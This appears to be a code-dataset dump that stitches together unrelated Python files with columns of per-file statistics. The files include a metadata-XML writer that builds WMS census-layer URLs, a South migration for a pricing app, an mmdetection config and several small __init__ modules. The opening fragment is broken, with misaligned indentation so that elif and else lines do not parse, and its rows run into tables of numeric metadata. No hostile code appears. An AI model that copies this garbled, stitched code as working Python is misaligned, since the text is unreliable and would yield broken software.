        GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=2018 State Legislative Districts - Lower,2018 State Legislative Districts - Lower Labels' + Format2EPSG + 'BBOX=+11679625.942909468,4709198.547476525,-11645573.246808422,4737900.651597611' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('UGA',Theme,flags=0):
        GraphicURL = '<gco:CharacterString>' + Census2020 + '&LAYERS=Urban Growth Areas, Urban Growth Areas Labels' + Format2EPSG + 'BBOX=+11679625.942909468,4709198.547476525,-11645573.246808422,4737900.651597611' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Unified School Districts',Theme,flags=0):
        GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Unified School Districts,Unified School Districts Labels' + Format2EPSG + 'BBOX=+11679625.942909468,4709198.547476525,-11645573.246808422,4737900.651597611' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('All Roads',Theme,flags=0):
        GraphicURL = '<gco:CharacterString>' + PhysicalFeatures + '&LAYERS=Primary Roads,Primary Roads Labels, Secondary Roads, Secondary Roads Labels, Local Roads, Local Roads Labels' + Format2EPSG + 'BBOX=+11679625.942909468,4709198.547476525,-11645573.246808422,4737900.651597611' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
elif re.search('Places',Theme,flags=0):
        GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=Census Designated Places,Census Designated Places Labels,Incorporated Places,Incorporated Places Labels' + Format2EPSG + 'BBOX=42.299053,-71.408142,42.35679,-70.798861' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
#Census Designated Places,Census Designated Places Labels,Incorporated Places,Incorporated Places Labels
elif re.search('PUMA',Theme, flags=0):
        GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=2010 Census Public Use Microdata Areas,2010 Census Public Use Microdata Areas ' + Format2EPSG + 'BBOX=42.1993,-71.4805,42.6317,-70.7939' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
    elif re.search(r'\(SLD\) Upper Chamber State', Theme, flags=0):
        GraphicURL = '<gco:CharacterString>' + CurrentWMS + '&LAYERS=2018 State Legislative Districts - Upper, 2018 State Legislative Districts - Upper Labels' + Format2EPSG + 'BBOX=42.1993,-71.4805,42.6317,-70.7939' + WidthHeight + '</gco:CharacterString>'
NewFile.write(GraphicURL)
else:
NewFile.write('<gco:CharacterString> Unable to determine the Theme' + Theme + 'for the Browse Graphic </gco:CharacterString>')
NewFile.write('</gmd:fileName>\n')
NewFile.write('</gmd:MD_BrowseGraphic>\n')
NewFile.write('</gmd:graphicOverview>\n') | 95.942623 | 665 | 0.729346 | 1,329 | 11,705 | 6.419865 | 0.173815 | 0.118143 | 0.082044 | 0.098453 | 0.821378 | 0.808017 | 0.789381 | 0.789381 | 0.789381 | 0.738631 | 0 | 0.124888 | 0.139428 | 11,705 | 122 | 666 | 95.942623 | 0.722128 | 0.01666 | 0 | 0.375 | 0 | 0.067308 | 0.596135 | 0.272112 | 0 | 0 | 0.000703 | 0 | 0 | 1 | 0.009615 | false | 0 | 0.076923 | 0 | 0.086538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0d406276a5762d8d397797ee6512af1cca719e34 | 30 | py | Python | pyOSA/Old-2021-04-09/__init__.py | gregmoille/InstrumentControl | 4cc8477e36f7c4ad4bf4f54036fdd8dd985b4133 | [
"MIT"
] | 3 | 2018-05-02T20:14:15.000Z | 2020-10-18T03:57:09.000Z | pyOSA/.ipynb_checkpoints/__init__-checkpoint.py | gregmoille/InstrumentControl | 4cc8477e36f7c4ad4bf4f54036fdd8dd985b4133 | [
"MIT"
] | 1 | 2019-05-23T15:21:08.000Z | 2019-05-23T15:21:08.000Z | pyOSA/.ipynb_checkpoints/__init__-checkpoint.py | gregmoille/InstrumentControl | 4cc8477e36f7c4ad4bf4f54036fdd8dd985b4133 | [
"MIT"
] | 2 | 2019-05-16T20:36:25.000Z | 2020-09-22T18:26:49.000Z | from .yokogawa import Yokogawa | 30 | 30 | 0.866667 | 4 | 30 | 6.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 30 | 1 | 30 | 30 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b4bc99ea83c9b578e4c6cdb222591a18012b5825 | 40 | py | Python | tests/interactions/conftest.py | CSI-BennettUniversity/Sample-Project-1 | 23197352372b7ad00a026683477b5a95a4178e35 | [
"MIT"
] | 5 | 2020-07-30T16:47:30.000Z | 2021-02-15T16:44:59.000Z | tests/interactions/conftest.py | CSI-BennettUniversity/Sample-Project-1 | 23197352372b7ad00a026683477b5a95a4178e35 | [
"MIT"
] | 4 | 2021-06-04T23:42:41.000Z | 2021-09-11T03:17:12.000Z | tests/interactions/conftest.py | CSI-BennettUniversity/Sample-Project-1 | 23197352372b7ad00a026683477b5a95a4178e35 | [
"MIT"
] | 7 | 2020-07-05T14:29:17.000Z | 2021-06-05T14:34:20.000Z | import csv
import random
import pytest
| 8 | 13 | 0.825 | 6 | 40 | 5.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175 | 40 | 4 | 14 | 10 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
371e0a181c5ce1e7346dcfa35a8bf08e2f55df00 | 20 | py | Python | openbu/__init__.py | bam241/ONIX | 021c9da664eb4b85ede1c0993555341b87011c29 | [
"MIT"
] | null | null | null | openbu/__init__.py | bam241/ONIX | 021c9da664eb4b85ede1c0993555341b87011c29 | [
"MIT"
] | null | null | null | openbu/__init__.py | bam241/ONIX | 021c9da664eb4b85ede1c0993555341b87011c29 | [
"MIT"
] | null | null | null | from . import couple | 20 | 20 | 0.8 | 3 | 20 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 20 | 1 | 20 | 20 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2eb11e5be56f0c8dd0bed3433ba7747ed2dfe190 | 252 | py | Python | resources/models.py | meynmd/mmdetection | 0064c4a1dd656cc96cdac05050dbb4db0fce54b5 | [
"Apache-2.0"
] | null | null | null | resources/models.py | meynmd/mmdetection | 0064c4a1dd656cc96cdac05050dbb4db0fce54b5 | [
"Apache-2.0"
] | null | null | null | resources/models.py | meynmd/mmdetection | 0064c4a1dd656cc96cdac05050dbb4db0fce54b5 | [
"Apache-2.0"
] | null | null | null | MODELS = {
'cascade_rcnn': {
'config': 'configs/cascade_rcnn/cascade_rcnn_x101_64x4d_fpn_20e_coco.py',
'checkpoint': 'pretrained/cascade_rcnn_x101_64x4d_fpn/cascade_rcnn_x101_64x4d_fpn_20e_coco_20200509_224357-051557b1.pth'
}
}
| 36 | 128 | 0.757937 | 33 | 252 | 5.181818 | 0.515152 | 0.321637 | 0.263158 | 0.350877 | 0.48538 | 0.350877 | 0.350877 | 0 | 0 | 0 | 0 | 0.198157 | 0.138889 | 252 | 6 | 129 | 42 | 0.589862 | 0 | 0 | 0 | 0 | 0 | 0.761905 | 0.650794 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2ec1934efa9445e043b13e9d7fe8270050d7edf2 | 19 | py | Python | afbmq/__init__.py | JMarkin/afbmq | 8491abfdd17e2ab745b5150eafdaf68a0f3cd1d0 | [
"MIT"
] | null | null | null | afbmq/__init__.py | JMarkin/afbmq | 8491abfdd17e2ab745b5150eafdaf68a0f3cd1d0 | [
"MIT"
] | null | null | null | afbmq/__init__.py | JMarkin/afbmq | 8491abfdd17e2ab745b5150eafdaf68a0f3cd1d0 | [
"MIT"
] | null | null | null | from .fb import FB
| 9.5 | 18 | 0.736842 | 4 | 19 | 3.5 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 19 | 1 | 19 | 19 | 0.933333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2ec7ab672d93f39da4e52af99693f8a34f76f285 | 68 | py | Python | src/tests/__init__.py | rschwa6308/Physics-2.0 | 40775d41304262807d86b5984db55dff45b3edfc | [
"MIT"
] | 7 | 2017-03-31T15:48:00.000Z | 2019-06-29T17:46:56.000Z | src/tests/__init__.py | rschwa6308/Physics-2.0 | 40775d41304262807d86b5984db55dff45b3edfc | [
"MIT"
] | 12 | 2017-04-03T23:35:57.000Z | 2019-01-23T00:38:03.000Z | src/tests/__init__.py | rschwa6308/Physics-2.0 | 40775d41304262807d86b5984db55dff45b3edfc | [
"MIT"
] | 3 | 2017-03-31T20:57:25.000Z | 2019-10-24T16:12:27.000Z | from .tests import *
def run_all_tests():
test_body_movement()
| 13.6 | 24 | 0.720588 | 10 | 68 | 4.5 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.176471 | 68 | 4 | 25 | 17 | 0.803571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2ecb56aebe10c1f15432d36862462b35bde26a5b | 111 | py | Python | service/Resources/__init__.py | brandonkdutton/cs361-service | 87ddd06a6de8dfabe1ffb59c01fa43afc91f8e23 | [
"Apache-2.0"
] | null | null | null | service/Resources/__init__.py | brandonkdutton/cs361-service | 87ddd06a6de8dfabe1ffb59c01fa43afc91f8e23 | [
"Apache-2.0"
] | null | null | null | service/Resources/__init__.py | brandonkdutton/cs361-service | 87ddd06a6de8dfabe1ffb59c01fa43afc91f8e23 | [
"Apache-2.0"
] | null | null | null | from .image_transformer import ImageTransformer
from .image import Image
from .image_upload import ImageUpload
| 27.75 | 47 | 0.864865 | 14 | 111 | 6.714286 | 0.5 | 0.287234 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 111 | 3 | 48 | 37 | 0.949495 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
2eefa4a18222c24a5a82cd68ea5552a29329d87e | 17,010 | py | Python | src/ralph_pricing/migrations/0001_initial.py | zefciu/ralph_pricing | f3c9e23b36331ec0ab464afd08fcab5f96921c1e | [
"Apache-2.0"
] | null | null | null | src/ralph_pricing/migrations/0001_initial.py | zefciu/ralph_pricing | f3c9e23b36331ec0ab464afd08fcab5f96921c1e | [
"Apache-2.0"
] | null | null | null | src/ralph_pricing/migrations/0001_initial.py | zefciu/ralph_pricing | f3c9e23b36331ec0ab464afd08fcab5f96921c1e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Device'
db.create_table('ralph_pricing_device', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('device_id', self.gf('django.db.models.fields.IntegerField')(unique=True)),
('asset_id', self.gf('django.db.models.fields.IntegerField')(default=None, unique=True, null=True, blank=True)),
('is_virtual', self.gf('django.db.models.fields.BooleanField')(default=False)),
('is_blade', self.gf('django.db.models.fields.BooleanField')(default=False)),
('slots', self.gf('django.db.models.fields.FloatField')(default=0)),
))
db.send_create_signal('ralph_pricing', ['Device'])
# Adding model 'Venture'
db.create_table('ralph_pricing_venture', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('venture_id', self.gf('django.db.models.fields.IntegerField')()),
('name', self.gf('django.db.models.fields.CharField')(default=u'', max_length=255)),
('department', self.gf('django.db.models.fields.CharField')(default=u'', max_length=255)),
('parent', self.gf('mptt.fields.TreeForeignKey')(default=None, related_name=u'children', null=True, blank=True, to=orm['ralph_pricing.Venture'])),
('lft', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
('rght', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
('tree_id', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
('level', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
))
db.send_create_signal('ralph_pricing', ['Venture'])
# Adding model 'DailyPart'
db.create_table('ralph_pricing_dailypart', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('date', self.gf('django.db.models.fields.DateField')()),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('pricing_device', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ralph_pricing.Device'])),
('asset_id', self.gf('django.db.models.fields.IntegerField')()),
('price', self.gf('django.db.models.fields.DecimalField')(max_digits=16, decimal_places=6)),
('is_deprecated', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('ralph_pricing', ['DailyPart'])
# Adding unique constraint on 'DailyPart', fields ['date', 'asset_id']
db.create_unique('ralph_pricing_dailypart', ['date', 'asset_id'])
# Adding model 'DailyDevice'
db.create_table('ralph_pricing_dailydevice', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('date', self.gf('django.db.models.fields.DateField')()),
('name', self.gf('django.db.models.fields.CharField')(max_length=255)),
('pricing_device', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ralph_pricing.Device'])),
('parent', self.gf('django.db.models.fields.related.ForeignKey')(related_name=u'child_set', on_delete=models.SET_NULL, default=None, to=orm['ralph_pricing.Device'], blank=True, null=True)),
('price', self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=16, decimal_places=6)),
('pricing_venture', self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['ralph_pricing.Venture'], null=True, on_delete=models.SET_NULL, blank=True)),
('is_deprecated', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('ralph_pricing', ['DailyDevice'])
# Adding unique constraint on 'DailyDevice', fields ['date', 'pricing_device']
db.create_unique('ralph_pricing_dailydevice', ['date', 'pricing_device_id'])
# Adding model 'UsageType'
db.create_table('ralph_pricing_usagetype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
))
db.send_create_signal('ralph_pricing', ['UsageType'])
# Adding model 'UsagePrice'
db.create_table('ralph_pricing_usageprice', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ralph_pricing.UsageType'])),
('price', self.gf('django.db.models.fields.DecimalField')(max_digits=16, decimal_places=6)),
('start', self.gf('django.db.models.fields.DateField')()),
('end', self.gf('django.db.models.fields.DateField')()),
))
db.send_create_signal('ralph_pricing', ['UsagePrice'])
# Adding unique constraint on 'UsagePrice', fields ['start', 'type']
db.create_unique('ralph_pricing_usageprice', ['start', 'type_id'])
# Adding unique constraint on 'UsagePrice', fields ['end', 'type']
db.create_unique('ralph_pricing_usageprice', ['end', 'type_id'])
# Adding model 'DailyUsage'
db.create_table('ralph_pricing_dailyusage', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('date', self.gf('django.db.models.fields.DateField')()),
('pricing_venture', self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['ralph_pricing.Venture'], null=True, on_delete=models.SET_NULL, blank=True)),
('pricing_device', self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['ralph_pricing.Device'], null=True, on_delete=models.SET_NULL, blank=True)),
('value', self.gf('django.db.models.fields.FloatField')()),
('type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ralph_pricing.UsageType'])),
))
db.send_create_signal('ralph_pricing', ['DailyUsage'])
# Adding unique constraint on 'DailyUsage', fields ['date', 'pricing_device', 'type']
db.create_unique('ralph_pricing_dailyusage', ['date', 'pricing_device_id', 'type_id'])
# Adding model 'ExtraCostType'
db.create_table('ralph_pricing_extracosttype', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
))
db.send_create_signal('ralph_pricing', ['ExtraCostType'])
# Adding model 'ExtraCost'
db.create_table('ralph_pricing_extracost', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('start', self.gf('django.db.models.fields.DateField')()),
('end', self.gf('django.db.models.fields.DateField')()),
('type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ralph_pricing.ExtraCostType'])),
('price', self.gf('django.db.models.fields.DecimalField')(max_digits=16, decimal_places=6)),
('pricing_venture', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ralph_pricing.Venture'])),
))
db.send_create_signal('ralph_pricing', ['ExtraCost'])
# Adding unique constraint on 'ExtraCost', fields ['start', 'pricing_venture', 'type']
db.create_unique('ralph_pricing_extracost', ['start', 'pricing_venture_id', 'type_id'])
# Adding unique constraint on 'ExtraCost', fields ['end', 'pricing_venture', 'type']
db.create_unique('ralph_pricing_extracost', ['end', 'pricing_venture_id', 'type_id'])
def backwards(self, orm):
# Removing unique constraint on 'ExtraCost', fields ['end', 'pricing_venture', 'type']
db.delete_unique('ralph_pricing_extracost', ['end', 'pricing_venture_id', 'type_id'])
# Removing unique constraint on 'ExtraCost', fields ['start', 'pricing_venture', 'type']
db.delete_unique('ralph_pricing_extracost', ['start', 'pricing_venture_id', 'type_id'])
# Removing unique constraint on 'DailyUsage', fields ['date', 'pricing_device', 'type']
db.delete_unique('ralph_pricing_dailyusage', ['date', 'pricing_device_id', 'type_id'])
# Removing unique constraint on 'UsagePrice', fields ['end', 'type']
db.delete_unique('ralph_pricing_usageprice', ['end', 'type_id'])
# Removing unique constraint on 'UsagePrice', fields ['start', 'type']
db.delete_unique('ralph_pricing_usageprice', ['start', 'type_id'])
# Removing unique constraint on 'DailyDevice', fields ['date', 'pricing_device']
db.delete_unique('ralph_pricing_dailydevice', ['date', 'pricing_device_id'])
# Removing unique constraint on 'DailyPart', fields ['date', 'asset_id']
db.delete_unique('ralph_pricing_dailypart', ['date', 'asset_id'])
# Deleting model 'Device'
db.delete_table('ralph_pricing_device')
# Deleting model 'Venture'
db.delete_table('ralph_pricing_venture')
# Deleting model 'DailyPart'
db.delete_table('ralph_pricing_dailypart')
# Deleting model 'DailyDevice'
db.delete_table('ralph_pricing_dailydevice')
# Deleting model 'UsageType'
db.delete_table('ralph_pricing_usagetype')
# Deleting model 'UsagePrice'
db.delete_table('ralph_pricing_usageprice')
# Deleting model 'DailyUsage'
db.delete_table('ralph_pricing_dailyusage')
# Deleting model 'ExtraCostType'
db.delete_table('ralph_pricing_extracosttype')
# Deleting model 'ExtraCost'
db.delete_table('ralph_pricing_extracost')
models = {
'ralph_pricing.dailydevice': {
'Meta': {'ordering': "(u'pricing_device', u'date')", 'unique_together': "((u'date', u'pricing_device'),)", 'object_name': 'DailyDevice'},
'date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deprecated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'child_set'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['ralph_pricing.Device']", 'blank': 'True', 'null': 'True'}),
'price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '16', 'decimal_places': '6'}),
'pricing_device': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_pricing.Device']"}),
'pricing_venture': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['ralph_pricing.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
},
'ralph_pricing.dailypart': {
'Meta': {'ordering': "(u'asset_id', u'pricing_device', u'date')", 'unique_together': "((u'date', u'asset_id'),)", 'object_name': 'DailyPart'},
'asset_id': ('django.db.models.fields.IntegerField', [], {}),
'date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_deprecated': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '6'}),
'pricing_device': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_pricing.Device']"})
},
'ralph_pricing.dailyusage': {
'Meta': {'ordering': "(u'pricing_device', u'type', u'date')", 'unique_together': "((u'date', u'pricing_device', u'type'),)", 'object_name': 'DailyUsage'},
'date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pricing_device': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['ralph_pricing.Device']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'pricing_venture': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['ralph_pricing.Venture']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_pricing.UsageType']"}),
'value': ('django.db.models.fields.FloatField', [], {})
},
'ralph_pricing.device': {
'Meta': {'object_name': 'Device'},
'asset_id': ('django.db.models.fields.IntegerField', [], {'default': 'None', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'device_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_blade': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_virtual': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slots': ('django.db.models.fields.FloatField', [], {'default': '0'})
},
'ralph_pricing.extracost': {
'Meta': {'unique_together': "[(u'start', u'pricing_venture', u'type'), (u'end', u'pricing_venture', u'type')]", 'object_name': 'ExtraCost'},
'end': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '6'}),
'pricing_venture': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_pricing.Venture']"}),
'start': ('django.db.models.fields.DateField', [], {}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_pricing.ExtraCostType']"})
},
'ralph_pricing.extracosttype': {
'Meta': {'object_name': 'ExtraCostType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'ralph_pricing.usageprice': {
'Meta': {'ordering': "(u'type', u'start')", 'unique_together': "[(u'start', u'type'), (u'end', u'type')]", 'object_name': 'UsagePrice'},
'end': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '6'}),
'start': ('django.db.models.fields.DateField', [], {}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_pricing.UsageType']"})
},
'ralph_pricing.usagetype': {
'Meta': {'object_name': 'UsageType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'ralph_pricing.venture': {
'Meta': {'object_name': 'Venture'},
'department': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'default': 'None', 'related_name': "u'children'", 'null': 'True', 'blank': 'True', 'to': "orm['ralph_pricing.Venture']"}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'venture_id': ('django.db.models.fields.IntegerField', [], {})
}
}
complete_apps = ['ralph_pricing'] | 64.923664 | 228 | 0.614403 | 1,905 | 17,010 | 5.315486 | 0.055118 | 0.081375 | 0.141023 | 0.201462 | 0.864408 | 0.803674 | 0.776318 | 0.730298 | 0.668082 | 0.619297 | 0 | 0.005175 | 0.182011 | 17,010 | 262 | 229 | 64.923664 | 0.722582 | 0.09224 | 0 | 0.350785 | 0 | 0.005236 | 0.514798 | 0.333268 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010471 | false | 0 | 0.020942 | 0 | 0.04712 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
2efc7c977f0f6256952f051974811b1d58553d10 | 83 | py | Python | paddleseg3d/datasets/preprocess_utils/__init__.py | parap1uie-s/PaddleSeg3D | 419e8158f057c98e3c78b2a5f80254259ec8478a | [
"Apache-2.0"
] | null | null | null | paddleseg3d/datasets/preprocess_utils/__init__.py | parap1uie-s/PaddleSeg3D | 419e8158f057c98e3c78b2a5f80254259ec8478a | [
"Apache-2.0"
] | null | null | null | paddleseg3d/datasets/preprocess_utils/__init__.py | parap1uie-s/PaddleSeg3D | 419e8158f057c98e3c78b2a5f80254259ec8478a | [
"Apache-2.0"
] | null | null | null | from .values import *
from .geometry import *
from .uncompress import uncompressor
| 20.75 | 36 | 0.795181 | 10 | 83 | 6.6 | 0.6 | 0.30303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.144578 | 83 | 3 | 37 | 27.666667 | 0.929577 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
